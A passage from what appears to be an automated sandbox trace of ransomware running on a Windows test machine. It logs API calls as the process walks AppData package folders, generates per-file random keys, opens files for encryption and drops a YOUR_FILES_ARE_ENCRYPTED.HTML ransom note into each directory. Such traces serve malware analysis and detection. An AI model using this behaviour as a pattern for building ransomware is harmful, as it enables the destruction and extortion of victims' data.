cAlternateFileName="ACTIVA~1")) returned 1 [0121.887] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.887] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned 162 [0121.887] GetProcessHeap () returned 0x600000 [0121.887] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.888] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore" [0121.888] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*" [0121.888] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xabc1516c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xabc1516c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xabd6c431, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0xe29324, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.889] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xabc1516c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xabc1516c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xabd6c431, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0xe29324, cFileName="..", cAlternateFileName="")) returned 1 [0121.889] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabc1516c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xac14c25e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xac14c25e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x6b4210, dwReserved1=0xe29324, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0121.889] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.889] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned 182 [0121.889] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0121.889] lstrlenW (lpString=".dat") returned 4 [0121.889] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0121.889] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0121.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.purchasedialog_cw5n1h2txyewy\\windows.purchasedialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0121.890] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=16384) returned 1 [0121.890] GetProcessHeap () returned 0x600000 [0121.890] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0121.892] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="DA") returned 2 [0121.892] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="9E") returned 2 [0121.892] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="6E") returned 2 [0121.892] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="97") returned 2 [0121.892] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="8F") returned 2 [0121.892] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="18") returned 2 [0121.892] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="8D") returned 2 [0121.892] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="3C") returned 2 [0121.892] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="09") returned 2 [0121.892] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="5F") returned 2 [0121.892] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="02") returned 2 [0121.892] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="11") returned 2 [0121.892] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="2C") returned 2 [0121.892] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="17") returned 2 [0121.892] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="1E") returned 2 [0121.892] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="9A") returned 2 [0121.892] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="CA") returned 2 [0121.892] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="80") returned 2 [0121.892] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="A9") returned 2 [0121.892] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="2C") returned 2 [0121.892] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="BA") returned 2 [0121.892] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="6D") returned 2 [0121.892] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="85") returned 2 [0121.892] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="8B") returned 2 [0121.893] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="22") returned 2 [0121.893] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="D0") returned 2 [0121.893] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="90") returned 2 [0121.893] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="34") returned 2 [0121.893] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="CC") returned 2 [0121.893] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="6D") returned 2 [0121.893] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="E9") returned 2 [0121.893] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="2C") returned 2 [0121.893] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" [0121.893] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0121.893] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0121.893] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xabd46105, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xabd46105, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xabd46105, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x6b4210, dwReserved1=0xe29324, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0121.893] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.893] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG1") returned 187 [0121.893] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0121.893] lstrlenW (lpString=".LOG1") returned 5 [0121.893] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0121.893] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xabd6c431, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xabd6c431, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xabd6c431, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0xe29324, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0121.893] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.894] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG2") returned 187 [0121.894] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0121.894] lstrlenW (lpString=".LOG2") returned 5 [0121.894] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0121.894] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xabd6c431, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xabd6c431, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xabd6c431, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0xe29324, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0121.894] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.894] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 192 [0121.894] GetProcessHeap () returned 0x600000 [0121.894] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.purchasedialog_cw5n1h2txyewy\\windows.purchasedialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.895] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.896] CloseHandle (hObject=0x31c) returned 1 [0121.896] GetProcessHeap () returned 0x600000 [0121.896] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.896] GetProcessHeap () returned 0x600000 [0121.896] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.896] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xabc1516c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xabc1516c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xabc1516c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0121.896] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0121.896] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 176 [0121.896] GetProcessHeap () returned 0x600000 [0121.896] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.897] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.purchasedialog_cw5n1h2txyewy\\windows.purchasedialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.899] WriteFile (in: hFile=0x338, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.900] CloseHandle (hObject=0x338) returned 1 [0121.900] GetProcessHeap () returned 0x600000 [0121.900] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.900] GetProcessHeap () returned 0x600000 [0121.900] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.900] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xabc1516c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xabc1516c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xabc1516c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy", cAlternateFileName="WINDOW~1.0_N")) returned 0 [0121.900] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0121.900] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0121.900] GetProcessHeap () returned 0x600000 [0121.900] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.purchasedialog_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0121.901] WriteFile (in: hFile=0x214, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0121.902] CloseHandle (hObject=0x214) returned 1 [0121.902] GetProcessHeap () returned 0x600000 [0121.902] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.902] GetProcessHeap () returned 0x600000 [0121.902] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0121.904] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="windows_ie_ac_001", cAlternateFileName="WINDOW~1")) returned 1 [0121.904] StrStrIW (lpFirst="windows_ie_ac_001", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.904] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001") returned 66 [0121.904] GetProcessHeap () returned 0x600000 [0121.904] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0121.904] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001" [0121.904] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\*" [0121.904] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.905] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0121.905] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0121.905] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.905] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC") returned 69 [0121.905] GetProcessHeap () returned 0x600000 [0121.905] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.906] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC" [0121.906] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\*" [0121.906] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x316177e, dwReserved1=0x31616f8, cFileName=".", cAlternateFileName="")) returned 0x626838 [0121.907] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x316177e, dwReserved1=0x31616f8, cFileName="..", cAlternateFileName="")) returned 1 [0121.907] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x316177e, dwReserved1=0x31616f8, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0121.907] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.907] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache") returned 79 [0121.907] GetProcessHeap () returned 0x600000 [0121.907] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.908] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache") 